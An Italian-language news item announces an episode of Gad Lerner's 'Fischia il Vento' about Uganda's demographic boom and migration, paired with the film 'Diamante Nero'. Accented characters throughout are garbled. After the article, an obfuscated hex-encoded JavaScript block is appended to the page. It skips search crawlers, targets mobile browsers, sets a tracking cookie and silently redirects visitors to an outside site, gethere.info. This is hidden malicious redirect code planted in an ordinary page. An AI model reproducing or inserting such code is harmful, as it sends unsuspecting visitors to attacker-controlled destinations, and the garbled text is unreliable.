News

MercoledA� 9 dicembre su Laeffe “Fischia il Vento” un programma di Gad Lerner

IL FILM IN PRIMA TV ITALIANA a�?DIAMANTE NEROa�? E IL REPORTAGE DI GAD LERNER IN UGANDA PER UNa��INEDITA LETTURA DEMOGRAFICA DEL FENOMENO MIGRATORIO

#NonA?unmondoperbianchi. A? il titolo-hashtag della terza puntata di a�?Fischia il Ventoa�? di Gad Lerner, il programma multipiattaforma di giornalismo itinerante prodotto da laeffe, la TV di Feltrinelli, e la Repubblica, in onda mercoledA� 9 dicembre alle 21.00 su laeffe (can. 50 DTT e TivA?sat, 139 di Sky). Una serata dedicata ai cambiamenti demografici mondiali e alle conseguenze che queste trasformazioni, unite ai flussi migratori, avranno sulla composizione futura delle popolazioni occidentali e non solo; un approfondimento che si articola tra cinema e inchiesta affiancando al reportage di Gad Lerner il film in prima tv assoluta a�?Diamante Neroa�? di CA�line Sciamma.

Gad Lerner parte dalla��Italia, la penisola dai capelli bianchi, dove la��etA� media A? 45 anni e il tasso di feconditA� di 1,36 figli per donna, per arrivare fino in Uganda, Paese di bambini, dove la��etA� media A? 15 anni, protagonista di un vero e proprio boom demografico con un tasso di feconditA� di 6,2 figli per donna e una mortalitA� infantile in costante declino grazie ai successi ottenuti nella lotta contro la malaria e la��AIDS. Una crescita di popolazione che si intensifica spostandosi dalla capitale Kampala agli altopiani del nord dove A? piA? forte la cultura del fare figli e dove le politiche di controllo delle nascite attuate dal governo trovano le maggiori resistenze.

Gad Lerner incontra gli abitanti del villaggio di Amukugundu, che spiegano come a�?alle donne non sia possibile rifiutarsi di fare figli perchA� per loro A? stato pagato un prezzo prima del matrimonioa�?. Eppure, grazie al progresso economico e alla��aumento della scolarizzazione, qualcosa sta cambiando e molte donne oggi ricorrono di nascosto a metodi contraccettivi, oppure impongono un tetto al numero di gravidanze. Agli interventi del governo, raccontati dal ministro Placid Mihayo, si affiancano le attivitA� dei missionari e dei medici cattolici, come Thomas Molteni, direttore della��ospedale di Lacor. Ma cosa significa tutto questo per la��Europa? Questa incredibile crescita A? destinata a salvare il Vecchio Continente o a travolgerlo? Gad Lerner ne parla con uno dei piA? autorevoli demografi italiani, Massimo Livi Bacci, che racconta un mondo passato in due secoli da 1 miliardo a 7 miliardi di abitanti, che nel 2038 passeranno a 9 grazie soprattutto ai Paesi della��Africa sub-sahariana: a�?Senza��altro da noi ci sarA� piA? mescolanza etnicaa�� ma una popolazione si rigenera con i figli e con le migrazionia�?. Un Uomo Nuovo che cambia colore, quindi, come cambiano colore le scuole italiane. Benedetta Tobagi visita la scuola primaria Manzoni di Brescia dove, nella prima classe, i figli degli immigrati sono il 99 per cento.

Ad affiancare la riflessione del reportage di Gad Lerner, una grande prima visione assoluta, la��acclamato e pluripremiato a�?Diamante Neroa�? di CA�line Sciamma, storia delicata e profonda di una adolescente nera di seconda generazione che trova una strada propria e positiva in un mondo di bianchi e di gang etniche (Francia, 2014).

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}